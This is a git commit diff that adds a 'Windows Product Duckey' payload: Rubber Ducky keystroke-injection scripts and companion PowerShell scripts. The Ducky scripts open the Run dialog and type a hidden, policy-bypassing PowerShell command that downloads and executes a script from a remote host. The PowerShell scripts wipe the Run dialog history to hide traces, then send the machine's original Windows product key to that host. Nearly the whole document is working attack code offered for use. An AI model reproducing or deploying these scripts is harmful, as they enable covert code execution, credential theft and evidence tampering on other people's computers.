added payload Windows Product Duckey
parent
05f5b9c401
commit
3378957961
|
@ -0,0 +1,4 @@
|
|||
#Replace REMOTE_IP_ADDRESS with the actual IP address of the remote server hosting the script.
|
||||
|
||||
|
||||
Remove-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU" -Name "*" -Force; Invoke-WebRequest -Uri "http://REMOTE_IP_ADDRESS?duckey=$((Get-WmiObject -Class SoftwareLicensingService).OA3xOriginalProductKey)" -Method Get -UseBasicParsing | Out-Null; Exit
|
|
@ -0,0 +1,14 @@
|
|||
REM Title: Windows Product Duckey
|
||||
REM Author: Who-Is-Julien
|
||||
REM Description: This payload exfiltrate the target's Windows product key to a remote server.
|
||||
REM Target: Windows 10, 11
|
||||
|
||||
REM Replace REMOTE_IP_ADDRESS with the actual IP address of the remote server hosting the script.
|
||||
|
||||
|
||||
DELAY 2000
|
||||
GUI r
|
||||
DELAY 500
|
||||
STRING powershell -w h -NoP -NonI -Exec Bypass $pl = iwr http://REMOTE_IP_ADDRESS/.ps1; invoke-expression $pl
|
||||
DELAY 500
|
||||
ENTER
|
|
@ -0,0 +1,17 @@
|
|||
REM Title: Windows Product Duckey
|
||||
REM Author: Who-Is-Julien
|
||||
REM Description: This payload exfiltrate the target's Windows product key to a remote server.
|
||||
REM Target: Windows 10, 11
|
||||
|
||||
REM Replace REMOTE_IP_ADDRESS with the actual IP address of the remote server hosting the script.
|
||||
DEFINE REMOTE_IP_ADDRESS 192.168.1.10
|
||||
|
||||
|
||||
DELAY 2000
|
||||
GUI r
|
||||
DELAY 500
|
||||
STRING powershell -w h -NoP -NonI -Exec Bypass $pl = iwr http://
|
||||
STRING REMOTE_IP_ADDRESS
|
||||
STRING /.ps1; invoke-expression $pl
|
||||
DELAY 500
|
||||
ENTER
|
|
@ -0,0 +1,10 @@
|
|||
#Replace REMOTE_IP_ADDRESS with the actual IP address of the remote server hosting the script.
|
||||
|
||||
|
||||
#clear windows run dialog history
|
||||
Remove-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU" -Name "*" -Force
|
||||
|
||||
#retrieve and send the computer's original product key to a remote server
|
||||
Invoke-WebRequest -Uri "http://REMOTE_IP_ADDRESS?duckey=$((Get-WmiObject -Class SoftwareLicensingService).OA3xOriginalProductKey)" -Method Get -UseBasicParsing | Out-Null
|
||||
|
||||
Exit
|
Loading…
Reference in New Issue